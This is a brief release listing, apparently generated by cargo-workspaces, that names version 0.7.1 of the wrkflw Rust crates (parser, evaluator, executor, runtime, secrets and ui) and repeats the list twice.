wrkflw@0.7.1 wrkflw-evaluator@0.7.1 wrkflw-executor@0.7.1 wrkflw-parser@0.7.1 wrkflw-runtime@0.7.1 wrkflw-secrets@0.7.1 wrkflw-ui@0.7.1 Generated by cargo-workspaceswrkflw-parser@0.7.1 wrkflw-evaluator@0.7.1 wrkflw-executor@0.7.1 v0.7.1 wrkflw-runtime@0.7.1 wrkflw-secrets@0.7.1 wrkflw-ui@0.7.1 wrkflw@0.7.1 |